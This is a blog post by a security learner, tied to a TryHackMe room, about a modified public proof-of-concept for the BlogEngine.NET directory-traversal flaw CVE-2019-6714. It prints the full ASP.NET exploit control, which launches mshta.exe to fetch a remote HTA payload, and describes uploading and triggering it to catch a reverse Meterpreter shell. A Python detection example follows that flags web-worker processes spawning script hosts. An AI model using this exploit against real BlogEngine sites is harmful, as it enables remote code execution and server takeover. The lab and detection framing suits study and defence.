Modified CVE-2019-6714 PoC to execute payload via mshta.exe

Hey y’all. This will be a quick post discussing my experience in exploit development, where I modify the exploit for the CVE-2019-6714 vulnerability, specifically the exploit developed by Cobb (2019), which exploits a directory traversal vulnerability in the BlogEngine[.]NET content management system.

This was done for a TryHackMe boot2root machine — which I documented in the InfoSec Write-ups journal (see “Aleksey” 2022a; if the paywall is giving you problems, you can view it by opening your browser in private mode :wink: ).

I discuss the specifics of how to exploit this vulnerability in my writeup, but TL;DR — it works by uploading a C# script to a BlogEngine[.]NET-powered website that is vulnerable to CVE-2019-6714 and then triggering the exploit via a GET request to said C# script.

I posted my modified version of Cobb’s exploit to one of my GitHub repos. The source code of my modified exploit, minus the comments, is:

<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        System.Diagnostics.Process payload = new System.Diagnostics.Process();
        payload.StartInfo.FileName = "mshta.exe";
        payload.StartInfo.Arguments = "";
        payload.StartInfo.UseShellExecute = true;
        payload.StartInfo.CreateNoWindow = true;
        payload.Start();
    }
    
</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

Cobb’s original exploit uses C# network socket libraries to open a reverse shell back to the attacker’s machine. The TryHackMe room had me “upgrade” my shell to a Meterpreter shell, but I decided to bypass that step by modifying Cobb’s exploit to execute code via mshta.exe, generating a Meterpreter payload served as an HTA file, uploading the modified script to the BlogEngine[.]NET website, triggering it and finally catching a reverse Meterpreter shell. The line payload.StartInfo.Arguments = ""; should contain the URL of the HTA file to execute (note that the HTA served could carry any payload, not necessarily a reverse Meterpreter shell).
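From the defender’s side, the behaviour described above has a very recognisable shape in process-creation telemetry: the IIS worker process hosting an ASP.NET site (w3wp.exe) starts mshta.exe with a remote URL on its command line. The Python below is an added example, not part of this post or of Cobb’s PoC; it runs a small rule set over constructed Sysmon Event ID 1-style records (the field names, timestamps, paths and the example.invalid URL are all made up) and also generalises the parent/child rule to a few other script hosts a web worker should never spawn.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

# Script hosts / LOLBins an IIS worker process has no business starting.
# The post only involves mshta.exe; the other names are a generalisation.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
WEB_WORKERS = {"w3wp.exe"}          # IIS worker process hosting ASP.NET apps
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def _basename(image: str) -> str:
    """Lower-case file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()

def classify_event(event: Dict[str, str]) -> List[str]:
    """Return the reasons a process-creation event is suspicious ([] if none)."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    reasons = []
    if parent in WEB_WORKERS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    if child == "mshta.exe" and URL_RE.search(event.get("CommandLine", "")):
        reasons.append("mshta.exe given a remote URL")
    return reasons

def find_suspicious(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(UtcTime, reasons) for every event that trips at least one rule."""
    flagged = ((ev["UtcTime"], classify_event(ev)) for ev in events)
    return [hit for hit in flagged if hit[1]]

# Constructed sample events using Sysmon Event ID 1 field names (not real logs).
SAMPLE_EVENTS = [
    {"UtcTime": "2022-01-01 10:00:00", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/payload.hta"},   # the spawn in this post
    {"UtcTime": "2022-01-01 10:00:01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": "csc.exe /noconfig ..."},                          # normal ASP.NET compile
    {"UtcTime": "2022-01-01 10:00:02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\ui.hta"'},   # local HTA, not flagged
    {"UtcTime": "2022-01-01 10:00:03", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},                              # generalised rule
]

if __name__ == "__main__":
    for when, why in find_suspicious(SAMPLE_EVENTS):
        print(when, "; ".join(why))
```

The csc.exe record is included deliberately: w3wp.exe compiling pages is routine, so a rule keyed only on “w3wp.exe spawned something” would be noisy, whereas the script-host and URL conditions isolate the HTA technique this post uses.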

Conclusion

This isn’t really a remarkable discovery — just “building off” the discovery of someone smarter than myself and trying to make my life easier. Plus, I’m trying to be a hacker — and what made me want to go on with modifying Cobb’s exploit is that I didn’t want to follow the room’s instructions exactly as laid out. I gotta deviate from it in some way :wink:

Of course, I welcome any feedback or criticisms regarding my work :smiley:

References
